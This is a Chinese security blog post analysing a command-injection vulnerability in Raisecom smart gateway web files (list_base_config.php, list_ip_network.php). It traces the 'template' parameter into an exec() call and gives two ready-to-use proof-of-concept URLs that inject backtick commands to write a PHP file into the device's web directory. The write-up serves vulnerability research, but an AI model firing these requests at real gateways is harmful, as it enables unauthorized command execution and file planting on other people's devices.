瑞斯康达智能网关命令执行漏洞简单分析

黑白之道 2025-01-29 14:24

漏洞分析

今年看到这个厂商的设备又爆漏洞了，一起分析下这个命令执行漏洞

我们先根据网上的文章定位漏洞文件 list_base_config.php

image-20241231103058916

这里看到可以传入几个参数 type parts pages serch_value，我们往下看这个switch分支的判断条件，想要调用sslvpn_config_mod这个方法的话我们需要按照条件构造参数到这里参数应该是

parts=base_config&type=mod

我们进入到这个方法中，看到了几个exec函数，不过没找到上述传入的 $config_type = 2;在哪，没关系我们直接看这个朴实无华的命令拼接

image-20241231105423075

这里发现传入两个参数都可触发命令拼接我们选择 template 进行传参并带入exec函数执行，

template=`echo+-e+'<?php phpinfo();>'>/www/tmp/phpinfo.php`

那么到这里我们的完整poc应该就是

http://127.0.0.1/vpn/list_base_config.php?parts=base_config&type=mod&template=`echo+-e+'<?php phpinfo();?>'>/www/tmp/phpinfo.php`

image-20241231110849770

梅开二度

这里我们查看这个方法的调用还有以下几个文件

image-20241231111504917

随便看一个其他的 list_ip_network.php

image-20241231111545946

这里需要满足传参 Nradius_submit为ture的情况下即可，所以poc为

/vpn/list_ip_network.php?Nradius_submit=1&template=`echo+-e+'<?php phpinfo();?>'>/www/tmp/info.php`

image-20241231111949083

文章来源：狐狸说安全

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！

如侵权请私聊我们删文

END